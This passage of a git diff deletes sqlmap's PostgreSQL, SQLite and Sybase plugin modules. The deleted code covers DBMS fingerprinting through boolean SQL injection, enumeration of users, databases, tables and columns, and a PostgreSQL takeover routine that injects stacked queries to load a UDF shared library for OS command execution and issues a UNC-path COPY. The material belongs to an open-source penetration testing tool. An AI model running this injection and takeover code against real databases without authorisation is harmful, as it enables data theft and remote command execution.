Backend.setVersionList([">= 6.4.0", "< 6.5.0"]) - elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"): - Backend.setVersionList([">= 6.3.0", "< 6.4.0"]) - elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"): - Backend.setVersionList([">= 6.2.0", "< 6.3.0"]) - else: - Backend.setVersion("< 6.2.0") - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs(): - return - - infoMsg = "fingerprinting the back-end DBMS operating system" - logger.info(infoMsg) - - self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)") - inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()")) - - # Windows executables should always have ' Visual C++' or ' mingw' - # patterns within the banner - osWindows = (" Visual C++", "mingw") - - for osPattern in osWindows: - query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%" + osPattern + "%')>0" - - if inject.checkBooleanExpression(query): - Backend.setOs(OS.WINDOWS) - - break - - if Backend.getOs() is None: - Backend.setOs(OS.LINUX) - - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - logger.info(infoMsg) - - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py deleted file mode 100644 index 5aeb83d2..00000000 --- a/plugins/dbms/postgresql/syntax.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - Note: PostgreSQL has a general problem 
with concenation operator (||) precedence (hence the parentheses enclosing) - e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error ("argument of WHERE must be type boolean, not type text") - - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar' - """ - - def escaper(value): - return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py deleted file mode 100644 index 401f92a6..00000000 --- a/plugins/dbms/postgresql/takeover.py +++ /dev/null @@ -1,104 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import Backend -from lib.core.common import checkFile -from lib.core.common import decloakToTemp -from lib.core.common import randomStr -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import OS -from lib.core.exception import SqlmapSystemException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def udfSetRemotePath(self): - # On Windows - if Backend.isOs(OS.WINDOWS): - # The DLL can be in any folder where postgres user has - # read/write/execute access is valid - # NOTE: by not specifing any path, it will save into the - # data directory, on PostgreSQL 8.3 it is - # C:\Program Files\PostgreSQL\8.3\data. 
- self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) - - # On Linux - else: - # The SO can be in any folder where postgres user has - # read/write/execute access is valid - self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) - - def udfSetLocalPaths(self): - self.udfLocalFile = paths.SQLMAP_UDF_PATH - self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) - - self.getVersionFromBanner() - - banVer = kb.bannerFp["dbmsVersion"] - - if banVer >= "9.4": - majorVer = "9.4" - elif banVer >= "9.3": - majorVer = "9.3" - elif banVer >= "9.2": - majorVer = "9.2" - elif banVer >= "9.1": - majorVer = "9.1" - elif banVer >= "9.0": - majorVer = "9.0" - elif banVer >= "8.4": - majorVer = "8.4" - elif banVer >= "8.3": - majorVer = "8.3" - elif banVer >= "8.2": - majorVer = "8.2" - else: - errMsg = "unsupported feature on versions of PostgreSQL before 8.2" - raise SqlmapUnsupportedFeatureException(errMsg) - - try: - if Backend.isOs(OS.WINDOWS): - _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_") - checkFile(_) - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "dll" - else: - _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_") - checkFile(_) - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "so" - except SqlmapSystemException: - errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch()) - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfCreateFromSharedLib(self, udf, inpRet): - if udf in self.udfToCreate: - logger.info("creating UDF '%s' from the binary UDF file" % udf) - - inp = ", ".join(i for i in inpRet["input"]) - ret = inpRet["return"] - - # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html - inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp)) - inject.goStacked("CREATE 
OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf)) - - self.createdUdf.add(udf) - else: - logger.debug("keeping existing UDF '%s' as requested" % udf) - - def uncPathRequest(self): - self.createSupportTbl(self.fileTblName, self.tblField, "text") - inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py deleted file mode 100644 index bccf2c4b..00000000 --- a/plugins/dbms/sqlite/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import SQLITE_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.sqlite.enumeration import Enumeration -from plugins.dbms.sqlite.filesystem import Filesystem -from plugins.dbms.sqlite.fingerprint import Fingerprint -from plugins.dbms.sqlite.syntax import Syntax -from plugins.dbms.sqlite.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class SQLiteMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines SQLite methods - """ - - def __init__(self): - self.excludeDbsList = SQLITE_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.SQLITE] = Syntax.escape diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py deleted file mode 100644 index a3ced69b..00000000 --- a/plugins/dbms/sqlite/connector.py +++ /dev/null @@ -1,88 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 
'doc/COPYING' for copying permission -""" - -try: - import sqlite3 -except ImportError: - pass - -import logging - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapMissingDependence -from plugins.generic.connector import Connector as GenericConnector - - -class Connector(GenericConnector): - """ - Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite - User guide: http://docs.python.org/release/2.5/lib/module-sqlite3.html - API: http://docs.python.org/library/sqlite3.html - Debian package: python-sqlite (SQLite 2), python-pysqlite3 (SQLite 3) - License: MIT - - Possible connectors: http://wiki.python.org/moin/SQLite - """ - - def __init__(self): - GenericConnector.__init__(self) - self.__sqlite = sqlite3 - - def connect(self): - self.initConnection() - self.checkFileDb() - - try: - self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) - - cursor = self.connector.cursor() - cursor.execute("SELECT * FROM sqlite_master") - cursor.close() - - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: - warnMsg = "unable to connect using SQLite 3 library, trying with SQLite 2" - logger.warn(warnMsg) - - try: - try: - import sqlite - except ImportError: - errMsg = "sqlmap requires 'python-sqlite' third-party library " - errMsg += "in order to directly connect to the database '%s'" % self.db - raise SqlmapMissingDependence(errMsg) - - self.__sqlite = sqlite - self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: - raise SqlmapConnectionException(msg[0]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except 
self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) - return None - - def execute(self, query): - try: - self.cursor.execute(utf8encode(query)) - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) - except self.__sqlite.DatabaseError, msg: - raise SqlmapConnectionException(msg[0]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py deleted file mode 100644 index 865662bd..00000000 --- a/plugins/dbms/sqlite/enumeration.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getCurrentUser(self): - warnMsg = "on SQLite it is not possible to enumerate the current user" - logger.warn(warnMsg) - - def getCurrentDb(self): - warnMsg = "on SQLite it is not possible to get name of the current database" - logger.warn(warnMsg) - - def isDba(self): - warnMsg = "on SQLite the current user has all privileges" - logger.warn(warnMsg) - - def getUsers(self): - warnMsg = "on SQLite it is not possible to enumerate the users" - logger.warn(warnMsg) - - return [] - - def getPasswordHashes(self): - warnMsg = "on SQLite it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def getPrivileges(self, *args): - warnMsg = "on SQLite it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def getDbs(self): - warnMsg = 
"on SQLite it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) - - return [] - - def searchDb(self): - warnMsg = "on SQLite it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - errMsg = "on SQLite it is not possible to search columns" - raise SqlmapUnsupportedFeatureException(errMsg) - - def getHostname(self): - warnMsg = "on SQLite it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py deleted file mode 100644 index 7c404816..00000000 --- a/plugins/dbms/sqlite/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on SQLite it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on SQLite it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py deleted file mode 100644 index e03f9733..00000000 --- a/plugins/dbms/sqlite/fingerprint.py +++ /dev/null @@ -1,110 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import 
setDbms -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import SQLITE_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.SQLITE) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.SQLITE - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - - * http://www.sqlite.org/lang_corefunc.html - * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES): - setDbms(DBMS.SQLITE) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.SQLITE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") - - if result: - infoMsg = "confirming %s" % DBMS.SQLITE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) - - return False - else: - infoMsg = "actively fingerprinting %s" % DBMS.SQLITE - logger.info(infoMsg) - - result = 
inject.checkBooleanExpression("RANDOMBLOB(-1)>0") - version = '3' if result else '2' - Backend.setVersion(version) - - setDbms(DBMS.SQLITE) - - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - conf.db = "%s%s" % (DBMS.SQLITE, METADB_SUFFIX) diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py deleted file mode 100644 index 9c6d86aa..00000000 --- a/plugins/dbms/sqlite/syntax.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii - -from lib.core.common import Backend -from lib.core.common import isDBMSVersionAtLeast -from lib.core.settings import UNICODE_ENCODING -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Backend.setVersion('2') - ['2'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT 'abcdefgh' FROM foobar" - >>> Backend.setVersion('3') - ['3'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT CAST(X'6162636465666768' AS TEXT) FROM foobar" - """ - - def escaper(value): - # Reference: http://stackoverflow.com/questions/3444335/how-do-i-quote-a-utf-8-string-literal-in-sqlite3 - return "CAST(X'%s' AS TEXT)" % binascii.hexlify(value.encode(UNICODE_ENCODING) if isinstance(value, unicode) else value) - - retVal = expression - - if isDBMSVersionAtLeast('3'): - retVal = Syntax._escape(expression, quote, escaper) - - return retVal diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py deleted file mode 100644 index 49e3fb09..00000000 --- a/plugins/dbms/sqlite/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers 
(http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on SQLite it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on SQLite it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on SQLite it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on SQLite it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py deleted file mode 100644 index 9b8de285..00000000 --- a/plugins/dbms/sybase/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import SYBASE_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.sybase.enumeration import Enumeration -from plugins.dbms.sybase.filesystem import Filesystem -from plugins.dbms.sybase.fingerprint import Fingerprint -from plugins.dbms.sybase.syntax import Syntax -from plugins.dbms.sybase.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class SybaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Sybase methods - """ - - def __init__(self): - self.excludeDbsList = SYBASE_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - 
Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.SYBASE] = Syntax.escape diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py deleted file mode 100644 index 89e8847e..00000000 --- a/plugins/dbms/sybase/connector.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import _mssql - import pymssql -except ImportError: - pass - -import logging - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php - Debian package: python-pymssql - License: LGPL - - Possible connectors: http://wiki.python.org/moin/SQL%20Server - - Important note: pymssql library on your system MUST be version 1.0.2 - to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - raise SqlmapConnectionException(msg) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, 
"(remote) %s" % str(msg).replace("\n", " ")) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(utf8encode(query)) - retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - try: - self.connector.commit() - except pymssql.OperationalError: - pass - - return retVal diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py deleted file mode 100644 index 28c6d0dc..00000000 --- a/plugins/dbms/sybase/enumeration.py +++ /dev/null @@ -1,323 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import isTechniqueAvailable -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.dicts import SYBASE_TYPES -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.utils.pivotdumptable import pivotDumpTable -from lib.techniques.brute.use import columnExists -from plugins.generic.enumeration import Enumeration as 
GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getUsers(self): - infoMsg = "fetching database users" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].users - - randStr = randomStr() - query = rootQuery.inband.query - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = (False, True) - else: - blinds = (True,) - - for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) - - if retVal: - kb.data.cachedUsers = retVal[0].values()[0] - break - - return kb.data.cachedUsers - - def getPrivileges(self, *args): - warnMsg = "on Sybase it is not possible to fetch " - warnMsg += "database users privileges, sqlmap will check whether " - warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) - - users = [] - areAdmins = set() - - if conf.user: - users = [conf.user] - elif not len(kb.data.cachedUsers): - users = self.getUsers() - else: - users = kb.data.cachedUsers - - for user in users: - user = unArrayizeValue(user) - - if user is None: - continue - - isDba = self.isDba(user) - - if isDba is True: - areAdmins.add(user) - - kb.data.cachedUsersPrivileges[user] = None - - return (kb.data.cachedUsersPrivileges, areAdmins) - - def getDbs(self): - if len(kb.data.cachedDbs) > 0: - return kb.data.cachedDbs - - infoMsg = "fetching database names" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() - query = rootQuery.inband.query - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = [False, True] - else: - blinds = [True] - - for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) - - if retVal: 
- kb.data.cachedDbs = retVal[0].values()[0] - break - - if kb.data.cachedDbs: - kb.data.cachedDbs.sort() - - return kb.data.cachedDbs - - def getTables(self, bruteForce=None): - if len(kb.data.cachedTables) > 0: - return kb.data.cachedTables - - self.forceDbmsEnum() - - if conf.db == CURRENT_DB: - conf.db = self.getCurrentDb() - - if conf.db: - dbs = conf.db.split(",") - else: - dbs = self.getDbs() - - for db in dbs: - dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - - dbs = filter(None, dbs) - - infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) - logger.info(infoMsg) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = [False, True] - else: - blinds = [True] - - rootQuery = queries[Backend.getIdentifiedDbms()].tables - - for db in dbs: - for blind in blinds: - randStr = randomStr() - query = rootQuery.inband.query % db - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) - - if retVal: - for table in retVal[0].values()[0]: - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) - break - - for db, tables in kb.data.cachedTables.items(): - kb.data.cachedTables[db] = sorted(tables) if tables else tables - - return kb.data.cachedTables - - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. 
sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) columns" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - elif conf.db is not None: - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.col: - colList = conf.col.split(",") - else: - colList = [] - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - for col in colList: - colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - - if conf.tbl: - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - else: - errMsg = "unable to retrieve the tables " - errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) - - if bruteForce: - resumeAvailable = False - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries or colList: - columns = {} - - for column in colList: - columns[column] = None - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - columns[colName] = colType - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} - - return kb.data.cachedColumns - - message = "do you want to use common column existence check? 
[y/N/q] " - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return columnExists(paths.COMMON_COLUMNS) - - rootQuery = queries[Backend.getIdentifiedDbms()].columns - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = [False, True] - else: - blinds = [True] - - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - if dumpMode and colList: - table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - continue - - infoMsg = "fetching columns " - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - for blind in blinds: - randStr = randomStr() - query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) - - if retVal: - table = {} - columns = {} - - for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): - columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) - - table[safeSQLIdentificatorNaming(tbl)] = columns - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - - break - - return kb.data.cachedColumns - - def searchDb(self): 
